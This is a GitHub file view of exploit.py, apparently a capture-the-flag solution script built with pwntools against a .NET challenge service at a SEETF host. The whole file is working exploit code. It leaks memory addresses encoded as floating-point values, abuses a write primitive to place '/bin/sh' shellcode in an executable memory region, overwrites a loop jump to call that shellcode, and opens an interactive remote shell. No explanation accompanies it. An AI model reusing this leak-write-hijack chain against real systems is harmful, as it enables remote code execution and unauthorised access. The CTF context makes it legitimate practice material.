-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
91 lines (70 loc) · 1.8 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
from pwn import *
from sys import *
context.arch='amd64'
def do2hex(f):
return (struct.unpack('<Q', struct.pack('<d', f))[0])
def hex2do(f):
return struct.unpack('<d', f)[0]
HOST = "fun.chall.seetf.sg"
PORT = 50007
#p = process(["dotnet", "pointytail.dll"])
p = remote(HOST,PORT)
print(util.proc.pidof(p))
p.sendline(b'a')
p.recvuntil(b's = ')
res = (p.recvline()[1:-2]).split(b', ')
leak = do2hex(float(res[0]))
stack = do2hex(float(res[1]))
print(hex(leak), hex(stack))
arg1 = hex2do(p64(leak-8))
arg2 = hex2do(p64(stack))
p.sendline(f"s {arg1} {arg2}")
p.sendline(b'1')
p.recvuntil(b'c = ')
p.recvuntil(b'c = ')
res = p.recvline()[1:-2].split(b', ')
rwxp = do2hex(float(res[0]))-0xe92b0
print("rwxp: ", hex(rwxp))
sc = asm(shellcraft.sh())
chunks, chunk_size = len(sc), len(sc)//6
sc = [ sc[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]
print(sc)
target = rwxp
target_jmp = rwxp+0x14b95
arg1 = hex2do(p64(target-8))
arg2 = hex2do(p64(stack))
p.sendline(f"s {arg1} {arg2}")
payload = b'\x90'*8
write1 = hex2do((payload))
write2 = hex2do((payload))
p.sendline(f"c {write1} {write2}")
#Write Shellcode
for i in range(0,len(sc),2):
target = rwxp+((i+1)*8)
arg1 = hex2do(p64(target))
arg2 = hex2do(p64(stack))
p.sendline(f"s {arg1} {arg2}")
write1 = hex2do(sc[i])
write2 = hex2do(sc[i+1])
p.sendline(f"c {write1} {write2}")
shell = (asm(f"""
nop
nop
nop
nop
mov rbx, {rwxp}
call rbx
"""
))
chunks, chunk_size = len(shell), len(shell)//2
shell = [ shell[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]
#Overwrite jump while(1) to call rbx
for i in range(0,len(shell),2):
target = target_jmp
arg1 = hex2do(p64(target-8))
arg2 = hex2do(p64(stack))
p.sendline(f"s {arg1} {arg2}")
write1 = hex2do(shell[i])
write2 = hex2do(shell[i+1])
p.sendline(f"c {write1} {write2}")
p.interactive()